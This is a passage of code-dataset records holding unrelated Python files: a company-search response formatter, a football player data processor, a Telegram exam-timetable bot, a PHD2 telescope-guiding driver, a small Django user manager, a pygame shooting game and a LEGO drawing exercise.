\" + str(output))\noutput = fibonacci(3)\nprint(\"step 4: output = \" + str(output))\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70952336","text":"from aio_proxy.response.formatters.bilan_financier import format_bilan\nfrom aio_proxy.response.formatters.collectivite_territoriale import (\n format_collectivite_territoriale,\n)\nfrom aio_proxy.response.formatters.dirigeants import format_dirigeants\nfrom aio_proxy.response.formatters.etablissements import (\n format_etablissements_list,\n format_siege,\n)\nfrom aio_proxy.response.formatters.insee_bool import format_insee_bool\nfrom aio_proxy.response.formatters.non_diffusible import (\n hide_non_diffusible_fields,\n)\nfrom aio_proxy.response.formatters.selected_fields import (\n select_admin_fields,\n select_fields_to_include,\n)\nfrom aio_proxy.response.helpers import format_nom_complet, get_value, is_dev_env\n\n\ndef format_search_results(results, search_params):\n \"\"\"Format API response to follow a specific schema.\"\"\"\n formatted_results = []\n for result in results:\n\n def get_field(field, default=None):\n return get_value(result[\"unite_legale\"], field, default)\n\n # Hide some fields if non-diffusible\n is_non_diffusible = (\n True if get_field(\"statut_diffusion_unite_legale\") != \"O\" else False\n )\n\n result_formatted = {\n \"siren\": get_field(\"siren\"),\n \"nom_complet\": format_nom_complet(\n get_field(\"nom_complet\"),\n get_field(\"sigle\"),\n get_field(\"denomination_usuelle_1_unite_legale\"),\n get_field(\"denomination_usuelle_2_unite_legale\"),\n get_field(\"denomination_usuelle_3_unite_legale\"),\n ),\n \"nom_raison_sociale\": get_field(\"nom_raison_sociale\"),\n \"sigle\": get_field(\"sigle\"),\n \"nombre_etablissements\": int(get_field(\"nombre_etablissements\", default=1)),\n \"nombre_etablissements_ouverts\": int(\n get_field(\"nombre_etablissements_ouverts\", default=0)\n ),\n \"siege\": format_siege(get_field(\"siege\"), is_non_diffusible),\n \"activite_principale\": get_field(\"activite_principale_unite_legale\"),\n \"categorie_entreprise\": get_field(\"categorie_entreprise\"),\n \"annee_categorie_entreprise\": get_field(\"annee_categorie_entreprise\"),\n \"date_creation\": get_field(\"date_creation_unite_legale\"),\n \"date_mise_a_jour\": get_field(\"date_mise_a_jour_unite_legale\"),\n \"dirigeants\": format_dirigeants(\n get_field(\"dirigeants_pp\"),\n get_field(\"dirigeants_pm\"),\n is_non_diffusible,\n ),\n \"etat_administratif\": get_field(\"etat_administratif_unite_legale\"),\n \"nature_juridique\": get_field(\"nature_juridique_unite_legale\"),\n \"section_activite_principale\": get_field(\"section_activite_principale\"),\n \"tranche_effectif_salarie\": get_field(\n \"tranche_effectif_salarie_unite_legale\"\n ),\n \"annee_tranche_effectif_salarie\": get_field(\n \"annee_tranche_effectif_salarie\"\n ),\n \"statut_diffusion\": get_field(\"statut_diffusion_unite_legale\"),\n \"matching_etablissements\": format_etablissements_list(\n get_value(result, \"matching_etablissements\"), is_non_diffusible\n ),\n \"finances\": format_bilan(get_field(\"bilan_financier\")),\n \"complements\": {\n \"collectivite_territoriale\": format_collectivite_territoriale(\n get_field(\"colter_code\"),\n get_field(\"colter_code_insee\"),\n get_field(\"colter_elus\"),\n get_field(\"colter_niveau\"),\n ),\n \"convention_collective_renseignee\": get_field(\n \"convention_collective_renseignee\"\n ),\n \"egapro_renseignee\": get_field(\"egapro_renseignee\"),\n \"est_bio\": get_field(\"est_bio\"),\n \"est_entrepreneur_individuel\": get_field(\n \"est_entrepreneur_individuel\", default=False\n ),\n \"est_entrepreneur_spectacle\": get_field(\"est_entrepreneur_spectacle\"),\n \"est_ess\": format_insee_bool(\n get_field(\"economie_sociale_solidaire_unite_legale\")\n ),\n \"est_finess\": get_field(\"est_finess\"),\n \"est_organisme_formation\": get_field(\"est_organisme_formation\"),\n \"est_qualiopi\": get_field(\"est_qualiopi\"),\n \"liste_id_organisme_formation\": get_field(\n \"liste_id_organisme_formation\"\n ),\n \"est_rge\": get_field(\"est_rge\"),\n \"est_service_public\": get_field(\"est_service_public\"),\n \"est_societe_mission\": format_insee_bool(\n get_field(\"est_societe_mission\")\n ),\n \"est_uai\": get_field(\"est_uai\"),\n \"identifiant_association\": get_field(\n \"identifiant_association_unite_legale\"\n ),\n \"statut_entrepreneur_spectacle\": get_field(\n \"statut_entrepreneur_spectacle\",\n ),\n },\n }\n\n # Select fields to return\n if search_params.minimal:\n select_fields_to_include(search_params.include, result_formatted)\n\n if search_params.include_admin:\n etablissements = format_etablissements_list(\n get_field(\"etablissements\"), is_non_diffusible\n )\n score = get_value(result, \"meta\")[\"score\"]\n slug = get_field(\"slug\")\n select_admin_fields(\n search_params.include_admin,\n etablissements,\n score,\n slug,\n result_formatted,\n )\n\n # Hide most fields if unité légale is non-diffusible\n if is_non_diffusible:\n result_formatted = hide_non_diffusible_fields(result_formatted)\n\n # Include search score and tree field for dev environment\n if is_dev_env():\n result_formatted[\"meta\"] = get_value(result, \"meta\")\n formatted_results.append(result_formatted)\n return formatted_results\n","sub_path":"aio/aio-proxy/aio_proxy/response/format_search_results.py","file_name":"format_search_results.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"277931219","text":"#!/usr/bin/env python \nfrom distutils.core import setup\nimport os.path\n\nPACKAGE = 'wolfit'\nDIST_NAME = 'wolfit'\n\nsetup(name = DIST_NAME,\n description = 'The Wolfit dataflow engine.',\n version = '0.2',\n author = 'Philip van Oosten',\n author_email = 'philip.vanoosten@hogent.be',\n long_description = open('README.rst').read(),\n license = 'GNU GPLv2',\n packages = [PACKAGE, ],\n package_dir = {PACKAGE: os.path.join('src', PACKAGE)},\n url = 'http://code.google.com/p/wolfit/',\n scripts = ['scripts/wolfit-tools.py'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441462981","text":"from frictionless.field import Field\nfrom frictionless.schema import Schema\nfrom inflection import titleize\n\nimport pandas\nimport numpy\n\nfrom .base import BaseProcessor\n\nclass PlayersProcessor(BaseProcessor):\n\n name = 'players'\n description = \"Players in `clubs`. One row per player.\"\n\n def process_segment(self, segment):\n \n prep_df = pandas.DataFrame()\n\n json_normalized = pandas.json_normalize(segment.to_dict(orient='records'))\n\n self.set_checkpoint('json_normalized', json_normalized)\n\n href_parts = json_normalized['href'].str.split('/', 5, True)\n parent_href_parts = json_normalized['parent.href'].str.split('/', 5, True)\n\n prep_df['player_id'] = href_parts[4]\n prep_df['current_club_id'] = parent_href_parts[4]\n prep_df['name'] = self.url_unquote(href_parts[1])\n prep_df['pretty_name'] = prep_df['name'].apply(lambda x: titleize(x))\n prep_df['country_of_birth'] = json_normalized['place_of_birth'].str.replace('Heute: ', '', regex=False)\n prep_df['country_of_citizenship'] = json_normalized['citizenship']\n prep_df['date_of_birth'] = (\n pandas\n .to_datetime(\n arg=json_normalized['date_of_birth'],\n errors='coerce'\n )\n )\n prep_df['position'] = (\n json_normalized['position']\n .str.split(' - ', 3, True)[0]\n .str.capitalize()\n )\n prep_df['sub_position'] = json_normalized['position'].str.split(' - ', 3, True)[1]\n prep_df['foot'] = (\n json_normalized['foot']\n .replace('N/A', numpy.nan)\n .str.capitalize()\n )\n prep_df['height_in_cm'] = (\n (json_normalized['height']\n .replace('N/A', numpy.nan)\n .str.split('m', 2, True)[0]\n .str.replace(',','.')\n .astype(dtype=float) * 100\n ).fillna(0).astype(int)\n )\n\n prep_df['url'] = self.url_prepend(json_normalized['href'])\n\n self.set_checkpoint('prep', prep_df)\n return prep_df\n\n def process(self):\n self.prep_dfs = [self.process_segment(prep_df) for prep_df in self.raw_dfs]\n self.prep_df = pandas.concat(self.prep_dfs, axis=0).drop_duplicates(\n subset='player_id',\n keep='last'\n )\n\n def get_validations(self):\n return []\n\n def resource_schema(self):\n self.schema = Schema()\n\n self.schema.add_field(Field(name='player_id', type='integer'))\n self.schema.add_field(Field(name='current_club_id', type='integer'))\n self.schema.add_field(Field(name='name', type='string'))\n self.schema.add_field(Field(name='pretty_name', type='string'))\n self.schema.add_field(Field(name='country_of_birth', type='string'))\n self.schema.add_field(Field(name='country_of_citizenship', type='string'))\n self.schema.add_field(Field(name='date_of_birth', type='date'))\n self.schema.add_field(Field(name='position', type='string'))\n self.schema.add_field(Field(name='sub_position', type='string'))\n self.schema.add_field(Field(name='foot', type='string'))\n self.schema.add_field(Field(name='height_in_cm', type='integer'))\n self.schema.add_field(Field(\n name='url',\n type='string',\n format='uri'\n )\n )\n\n self.schema.primary_key = ['player_id']\n self.schema.foreign_keys = [\n {\"fields\": \"current_club_id\", \"reference\": {\"resource\": \"clubs\", \"fields\": \"club_id\"}}\n ]\n\n return self.schema\n","sub_path":"prep/assets/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498880236","text":"import logging\nimport os\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\nfrom readFile import *\nfrom uuid import uuid4\nimport helpTexts as ht\nimport log as lg\n# Enable logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef help_command(update, context):\n update.message.reply_html(ht.helpText)\n\n\ndef createUniversityKeyboard():\n university = getAllUniversities()\n keyboard = []\n for uni in university:\n keyboard.append([InlineKeyboardButton(uni, callback_data=uni)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef createSemesterKeyboard(context):\n semesters = getAllSemesterOfUniversity(getResponseData(context, 0))\n keyboard = []\n for sem in semesters:\n keyboard.append([InlineKeyboardButton(sem, callback_data=sem)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef createCourseKeyboard(context):\n courses = getAllCourseOfSemester(context)\n keyboard = []\n for course in courses:\n keyboard.append([InlineKeyboardButton(course, callback_data=course)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef sendTimeTable(context, update):\n data = getTimeTable(context)\n dataString = \"\"\n dataList = []\n for i, j in enumerate(data):\n if i == 0:\n heading = f\"{j['University']} {j['Course']} - Time Table \\n\\n🎓 University - {j['University']}\\n📚 Course - {j['Course']}\\n📖 Semester - {j['Sem']}\\n\\n\"\n dataString += heading\n\n singleData = f\"📝 Subject Name - {j['SubjectName']}\\n🗓️ Exam Date - {j['Date']}\\n⏰ Exam Time - {j['Time']}\\n❓ QP Code - {j['QPCode']}\\n\\n\\n\"\n dataString += singleData\n if i != 0 and i % 10 == 0:\n dataList.append(dataString)\n dataString = \"\"\n if(dataString):\n dataList.append(dataString)\n\n if len(dataList) == 0:\n update.callback_query.edit_message_text(dataString, parse_mode=\"HTML\")\n update.callback_query.message.reply_html(\n ht.footer, disable_web_page_preview=True)\n lg.addToLog(context, update)\n else:\n update.callback_query.message.delete()\n for i in dataList:\n update.callback_query.message.reply_html(i)\n update.callback_query.message.reply_html(\n ht.footer, disable_web_page_preview=True)\n lg.addToLog(context, update)\n\n\nhelp_keyboard = [[InlineKeyboardButton(\n \"Join Channel\", url=\"t.me/kslustudentshub\")]]\nhelp_reply_markup = InlineKeyboardMarkup(help_keyboard)\n\n\ndef start(update, context):\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n user = update.message.from_user\n channel_member = context.bot.get_chat_member(\n os.environ.get(\"CHANNEL_ID\"), user_id=update.message.chat_id)\n status = channel_member[\"status\"]\n lg.startLog(update, context, status)\n if(status == 'left'):\n update.message.reply_html(\n text=f\"Hi {user.first_name}👋🏻, to use me(Bot🤖) you have to be a member of the Law_Timetable channel in order to stay updated with the latest updates.\\n\\nPlease click below button to join and then /start the bot again.\", reply_markup=help_reply_markup)\n return\n else:\n update.message.reply_text(\n 'Choose Your 🎓University ⬇️', reply_markup=createUniversityKeyboard())\n\n\ncontactString = \"For any clarification/feedback/report Email- info.lawtimetable@gmail.com\"\n\n\ndef contactus(update, context):\n update.message.reply_html(contactString, disable_web_page_preview=True)\n\n\ndef end(update, context):\n context.user_data.clear()\n update.callback_query.message.delete()\n update.callback_query.message.reply_text(\n 'if you want again, send /start command')\n update.callback_query.message.reply_text(\n 'If its not working please report us use /contact to get contact details')\n\n\ndef getResponseData(context, position):\n return context.user_data.get(list(context.user_data.keys())[position])\n\n\ndef callBackQuery(update, context):\n query_data = update.callback_query.data\n key = str(uuid4())\n context.user_data[key] = query_data\n print(context.user_data)\n update.callback_query.answer()\n try:\n if query_data in getAllUniversities():\n update.callback_query.edit_message_text(\n 'Choose Your 📖Semester⬇️', reply_markup=createSemesterKeyboard(context))\n\n elif len(context.user_data) == 2 and query_data in getAllSemesterOfUniversity(getResponseData(context, 0)):\n update.callback_query.edit_message_text(\n 'Choose Your 📚Course⬇️', reply_markup=createCourseKeyboard(context))\n\n elif len(context.user_data) == 3 and query_data in getAllCourseOfSemester(context):\n sendTimeTable(context, update)\n context.user_data.clear()\n update.callback_query.message.reply_text(\n 'if you want again send /start')\n\n if len(context.user_data) > 3:\n end(update, context)\n\n except Exception as e:\n print(str(e))\n end(update, context)\n\n\ndef getTimeTablefromQPCode(update, context):\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n user = update.message.from_user\n channel_member = context.bot.get_chat_member(\n os.environ.get(\"CHANNEL_ID\"), user_id=update.message.chat_id)\n status = channel_member[\"status\"]\n if(status == 'left'):\n update.message.reply_html(\n text=f\"Hi {user.first_name}👋🏻, to use me(Bot🤖) you have to be a member of the Law_Timetable channel in order to stay updated with the latest updates.\\n\\nPlease click below button to join and then /start the bot again.\", reply_markup=help_reply_markup)\n return\n else:\n query = update.message.text[8:].split(' ')\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n if len(query[0]) == 0:\n qpText = f\"Please enter QPCode after /qpcode command\\nCheck /help if you have doubt or to know more\"\n update.message.reply_text(qpText)\n return\n try:\n data = getTimeTablebyQPCode(query[0])\n if(len(data) == 0):\n raise Exception(\n f\"Sorry, Data Not Found for {query[0]} QP Code\\nPlease Check QP Code and Try Again\")\n dataString = \"\"\n for i, j in enumerate(data):\n if i == 0:\n heading = f\"Time Table of QPCode {j['QPCode']}\\n\\n\\n\"\n dataString += heading\n singleData = f\"🎓 University - {j['University']}\\n📚 Course - {j['Course']}\\n📖 Semester - {j['Sem']}\\n📝 Subject Name - {j['SubjectName']}\\n🗓️ Exam Date - {j['Date']}\\n⏰ Exam Time - {j['Time']}\\n❓ QP Code - {j['QPCode']}\\n\\n\\n\"\n dataString += singleData\n\n update.message.reply_html(dataString)\n update.message.reply_html(ht.footer, disable_web_page_preview=True)\n except Exception as e:\n print(str(e))\n update.message.reply_text(\"Something Went Wrong\\nReport to Admin\")\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n\n updater = Updater(\n token=os.environ.get(\"BOT_TOKEN\"), use_context=True)\n PORT = int(os.environ.get('PORT', '8443'))\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n dispatcher.add_handler(CommandHandler(\"contact\", contactus))\n dispatcher.add_handler(CommandHandler(\"qpcode\", getTimeTablefromQPCode))\n updater.dispatcher.add_handler(CallbackQueryHandler(callBackQuery))\n\n dispatcher.add_error_handler(error)\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\", port=PORT,\n url_path=os.environ.get(\"BOT_TOKEN\"))\n updater.bot.set_webhook(\n os.environ.get(\"HOST_NAME\") + os.environ.get(\"BOT_TOKEN\"))\n logging.info(\"Starting Long Polling!\")\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"227447766","text":"import re\n\n\npattern=r\"^9[0-9][0-9]?$|^[1-9]\\d{1,2}$\"\n\n\ndef matchi(string):\n if re.match(pattern, string):\n print(\"MATCH\")\n else:\n print(\"NO MATCH\")\n\n\nmatchi(\"1234\")","sub_path":"pythonwork/regexnumbers.py","file_name":"regexnumbers.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160765331","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author = 'zealot'\n\n\nimport django_tables2 as tables\nfrom .models import Boo_commander\n\n\nclass Boo(tables.Table):\n class Meta:\n model = Boo_commander\n #attrs = {'class' : 'paleblue','table':'border cellpadding=10'}\n attrs = {'class' : 'paleblue',\n 'cellpadding' : 10,\n 'align' : 'left',\n 'td' :{\n 'align' :'center'\n }\n }\n","sub_path":"Boo/Boo_commander/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"112513296","text":"import json\nimport logging\nimport queue\nimport socket\nimport threading\nimport time\n\nfrom indi.device import Driver, properties\nfrom indi.device.pool import DevicePool\nfrom indi.message import const\nfrom telescopy import settings\n\n\n@DevicePool.register\nclass PHD2(Driver):\n name = \"PHD2\"\n\n general = properties.Group(\n \"GENERAL\",\n vectors=dict(\n connection=properties.Standard(\"CONNECTION\", onchange=\"connect\"),\n connection_settings=properties.TextVector(\n \"CONNECTION_SETTINGS\",\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n ip=properties.Text(\"IP_ADDRESS\", default=settings.PHD2_IP),\n port=properties.Text(\"PORT\", default=settings.PHD2_PORT),\n ),\n ),\n info=properties.TextVector(\n \"INFO\",\n enabled=False,\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n phdversion=properties.Text(\"PHD_VERSION\"),\n state=properties.Text(\"APP_STATE\"),\n ),\n ),\n ),\n )\n\n dithering = properties.Group(\n \"DITHERING\",\n enabled=False,\n vectors=dict(\n dither=properties.NumberVector(\n \"DITHER\",\n elements=dict(\n dither=properties.Number(\n \"DITHER_BY_PIXELS\", default=5, onwrite=\"dither\"\n ),\n ),\n ),\n dither_settle_settings=properties.NumberVector(\n \"DITHER_SETTLE_SETTINGS\",\n elements=dict(\n pixels=properties.Number(\"PIXELS\", default=1.5),\n time=properties.Number(\"TIME\", default=10),\n timeout=properties.Number(\"TIMEOUT\", default=30),\n ),\n ),\n ),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.connection = self.Connection(self)\n\n def connect(self, sender, **kwargs):\n if self.general.connection.connect.bool_value:\n self.connection.connect()\n self.general.info.enabled = True\n self.dithering.enabled = True\n else:\n self.general.info.enabled = False\n self.dithering.enabled = False\n\n def dither(self, sender, value, **kwargs):\n self.dithering.dither.dither.value = value\n amount = float(self.dithering.dither.dither.value)\n ra_only = False\n settle = {\n \"pixels\": self.dithering.dither_settle_settings.pixels.value,\n \"time\": self.dithering.dither_settle_settings.time.value,\n \"timeout\": self.dithering.dither_settle_settings.timeout.value,\n }\n self.connection.rpc(\"dither\", [amount, ra_only, settle])\n\n def event_settlebegin(self, **kwargs):\n self.dithering.dither.state_ = const.State.BUSY\n\n event_settling = event_settlebegin\n\n def event_settledone(self, **kwargs):\n self.dithering.dither.state_ = const.State.OK\n\n def event_version(self, phdversion, **kwargs):\n self.general.info.phdversion.value = phdversion\n\n def event_appstate(self, state, **kwargs):\n self.general.info.state.value = state\n\n def event_noop(self, **kwargs):\n pass\n\n event_loopingexposures = event_noop\n event_guidestep = event_noop\n\n class Connection:\n class Buffer:\n def __init__(self, connection, device):\n self._buffer = \"\"\n self.connection = connection\n self.device = device\n\n def append(self, msg):\n self._buffer += msg\n\n def process(self):\n messages = self._buffer.split(\"\\r\\n\")\n if messages[-1]:\n self._buffer = messages[-1]\n messages = messages[0:-1]\n else:\n self._buffer = \"\"\n\n for msg in messages:\n self.process_message(msg)\n\n def process_message(self, raw_msg):\n if not raw_msg:\n return\n\n msg = json.loads(raw_msg)\n if \"Event\" in msg:\n msg = {k.lower(): v for k, v in msg.items()}\n event_name = msg[\"event\"].lower()\n method = f\"event_{event_name}\"\n if hasattr(self.device, method):\n getattr(self.device, method)(**msg)\n else:\n print(msg)\n if \"jsonrpc\" in msg:\n print(msg)\n if msg[\"id\"] in self.connection.rpc_responses:\n self.connection.rpc_responses[msg[\"id\"]].put(msg)\n\n def __init__(self, device):\n self.buffer = self.Buffer(self, device)\n self.sock = None\n self.device = device\n self.rpc_serial = 0\n self.rpc_responses = {}\n\n def handle_incoming_messages(self):\n while True:\n logging.debug(f\"PHD2: waiting for data\")\n message = self.sock.recv(1024)\n if not message:\n logging.debug(f\"PHD2: no data, breaking\")\n break\n logging.debug(f\"PHD2: got data: {message}\")\n self.buffer.append(message.decode(\"latin1\"))\n self.buffer.process()\n\n def rpc(self, method, params, response_timeout=30):\n self.rpc_serial += 1\n id = self.rpc_serial\n payload = {\n \"method\": method,\n \"params\": params,\n \"id\": id,\n }\n q = queue.Queue()\n self.rpc_responses[id] = q\n payload_raw = json.dumps(payload) + \"\\r\\n\"\n print(payload_raw)\n self.sock.sendall(payload_raw.encode(\"latin1\"))\n try:\n response = q.get(timeout=response_timeout)\n except:\n raise Exception(\n f\"Timeout waiting for JSONRPC response for request id={id}\"\n )\n\n del self.rpc_responses[id]\n\n if \"result\" in response:\n return response[\"result\"]\n\n if \"error\" in response:\n raise Exception(response[\"error\"])\n\n raise Exception(f\"Invalid JSONRPC response for request id={id}\")\n\n def connect(self):\n ip = self.device.general.connection_settings.ip.value\n port = int(self.device.general.connection_settings.port.value)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((ip, port))\n\n handler_thread = threading.Thread(\n target=self.handle_incoming_messages, daemon=True,\n )\n handler_thread.start()\n","sub_path":"telescopy/devices/PHD2.py","file_name":"PHD2.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"183834666","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import redirect\n#模型\nfrom UserManager import models\n\ndef UserManager(request):\n #创建数据\n # models.UserInfo.objects.create(username=\"root\",password=\"694595504\",project_name=\"root\",role=0)\n # obj=models.UserInfo(username=\"lsf\",password=\"694595504\",project_name=\"某项目\",role=2)\n # obj.save()\n users=models.UserInfo.objects.all()\n # print(users) ## result,querySet =>Djiango=>[]\n return render(request,\"user_manager.html\",{\"users\":users})\n\n\ndef UserManager_add(request):\n if request.method=='POST':\n user=request.POST.get(\"username\",None)\n pwd=request.POST.get(\"pwd\",None)\n role=request.POST.get(\"role\",None)\n project_name=request.POST.get(\"project_name\",None)\n models.UserInfo.objects.create(username=user,password=pwd,role=role,project_name=project_name)\n \n return redirect(\"/userManager/userManager/\")\n\ndef UserManager_del(request):\n if request.method=='GET':\n id=request.GET.get(\"id\",None)\n models.UserInfo.objects.filter(id=id).delete()\n return redirect(\"/userManager/userManager/\")","sub_path":"UserManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142872145","text":"#importing images.\n#background, moving image, aiming pointer, message images\n\nbif = \"back.jpg\"\nmif = \"mif.png\"\nim='aim.png'\nimage='bam_logo.jpg'\ndisplay='oops.jpg'\nimport pygame, sys\nfrom pygame.locals import *\n\npygame.init()\nscreen = pygame.display.set_mode((600,300),0,32)\n\nbackground = pygame.image.load(bif).convert()\nmouse_c = pygame.image.load(mif).convert_alpha()\naim=pygame.image.load(im).convert_alpha()\nbam=pygame.image.load(image).convert()\noops=pygame.image.load(display).convert()\nx, y = 0, 0\nax,ay=0,0\nc=0\nmovex, movey = 0, 0\nclock = pygame.time.Clock()\nspeed = 180\n\nwhile True:\n \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_LEFT:\n movex = -1\n elif event.key == K_RIGHT:\n movex = +1\n elif event.key == K_UP:\n movey = -1\n elif event.key == K_DOWN:\n movey = +1\n if event.type == KEYUP:\n if event.key == K_LEFT:\n movex = 0\n elif event.key == K_RIGHT:\n movex = 0\n elif event.key == K_UP:\n movey = 0\n elif event.key == K_DOWN:\n movey = 0\n if event.type==MOUSEMOTION:\n ax=event.pos[0]\n ay=event.pos[1]\n if event.type==MOUSEBUTTONDOWN:\n c=1\n if event.type==MOUSEBUTTONUP:\n c=0\n second = clock.tick()\n milli = second/1000.0\n dm = milli*speed\n x+=movex\n y+=movey\n screen.blit(background, (0,0))\n screen.blit(mouse_c, (x, y))\n screen.blit(aim,(ax-25,ay-25))\n if c==1:\n if axx+333 or ay>y+312: #checks if shot in target\n screen.blit(oops,(0,0))\n else:\n screen.blit(bam,(0,0))\n x = x+dm\n y = y+dm\n if x<0:\n x=0\n if y<0:\n y=0\n if x > 600:\n x = 0\n if y > 300:\n y =0\n \n pygame.display.update()\n\n","sub_path":"game2.py","file_name":"game2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"641535855","text":"# YOUR NAME\n# CTEC 121 / Winter 2019\n# Module 4 / Problem Set 5\n# Problem 2 (50 points)\n\n\"\"\"\nUsing the graphics library, develop a Python program to draw the a set of LEGOS.\nYou will find a picture of the LEGO's in a file named LEGOS.png.\n\nBe sure to create one LEGO and then use the .clone() method whenever possible\nto create the other five.\n\"\"\"\n\nfrom graphics import *\n\n\ndef main():\n\n # Graphing window.\n win = GraphWin(\"Lego drawings.\", 960, 960)\n # Creating first lego.\n legoA1 = Rectangle(Point(80, 80), Point(400, 240))\n legoA1.setFill(\"Indigo\")\n legoA1.setOutline(\"Black\")\n legoA1.draw(win)\n\n # Creating first lego stud.\n # The studs are centered at X = 160 and X = 320\n # Studs are 60 pixels long, 30 high.\n legoA2 = Rectangle(Point(130, 50), Point(190, 80))\n legoA2.setFill(\"Indigo\")\n legoA2.setOutline(\"Black\")\n legoA2.draw(win)\n\n legoA3 = Rectangle(Point(290, 50), Point(350, 80))\n legoA3.setFill(\"Indigo\")\n legoA3.setOutline(\"Black\")\n legoA3.draw(win)\n\n # Clone legoA series.\n\n # Clone legoA1\n legoB1 = legoA1.clone()\n legoB1.move(500, 0)\n legoB1.setFill(\"Green\")\n legoB1.setOutline(\"Black\")\n legoB1.draw(win)\n # Clone legoA2\n legoB2 = legoA2.clone()\n legoB2.move(500, 0)\n legoB2.setFill(\"Green\")\n legoB2.setOutline(\"Black\")\n legoB2.draw(win)\n # Clone legoA3\n legoB3 = legoA3.clone()\n legoB3.move(500, 0)\n legoB3.setFill(\"Green\")\n legoB3.setOutline(\"Black\")\n legoB3.draw(win)\n\n # Clone again, for legoC\n legoC1 = legoA1.clone()\n legoC1.move(0, 240)\n legoC1.setFill(\"Red\")\n legoC1.setOutline(\"Black\")\n legoC1.draw(win)\n\n legoC2 = legoA2.clone()\n legoC2.move(0, 240)\n legoC2.setFill(\"Red\")\n legoC2.setOutline(\"Black\")\n legoC2.draw(win)\n\n legoC3 = legoA3.clone()\n legoC3.move(0, 240)\n legoC3.setFill(\"Red\")\n legoC3.setOutline(\"Black\")\n legoC3.draw(win)\n # Copy-Paste this structure, call it D. Clone from C.\n # Change the colors.\n\n legoD1 = legoC1.clone()\n legoD1.move(0, 240)\n legoD1.setFill(\"Yellow\")\n legoD1.setOutline(\"Black\")\n legoD1.draw(win)\n\n legoD2 = legoC2.clone()\n legoD2.move(0, 240)\n legoD2.setFill(\"Yellow\")\n legoD2.setOutline(\"Black\")\n legoD2.draw(win)\n\n legoD3 = legoC3.clone()\n legoD3.move(0, 240)\n legoD3.setFill(\"Yellow\")\n legoD3.setOutline(\"Black\")\n legoD3.draw(win)\n\n # Copy-Paste the previous data-structure again, call it E. Clone from B.\n # Change color to Cyan.\n legoE1 = legoB1.clone()\n legoE1.move(0, 240)\n legoE1.setFill(\"Cyan\")\n legoE1.setOutline(\"Black\")\n legoE1.draw(win)\n\n legoE2 = legoB2.clone()\n legoE2.move(0, 240)\n legoE2.setFill(\"Cyan\")\n legoE2.setOutline(\"Black\")\n legoE2.draw(win)\n\n legoE3 = legoB3.clone()\n legoE3.move(0, 240)\n legoE3.setFill(\"Cyan\")\n legoE3.setOutline(\"Black\")\n legoE3.draw(win)\n\n # Copy-Paste the data structure one last time, call it F. Clone from E.\n # Change color to black. Change Outline to red.\n legoF1 = legoE1.clone()\n legoF1.move(0, 240)\n legoF1.setFill(\"Black\")\n legoF1.setOutline(\"Red\")\n legoF1.draw(win)\n\n legoF2 = legoE2.clone()\n legoF2.move(0, 240)\n legoF2.setFill(\"Black\")\n legoF2.setOutline(\"Red\")\n legoF2.draw(win)\n\n legoF3 = legoE3.clone()\n legoF3.move(0, 240)\n legoF3.setFill(\"Black\")\n legoF3.setOutline(\"Red\")\n legoF3.draw(win)\n input(\"Press enter to exit drawing.\")\n win.close\n\n\nmain()\n","sub_path":"problem-set-5-problem-2.py","file_name":"problem-set-5-problem-2.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169397877","text":"import glfw\nimport 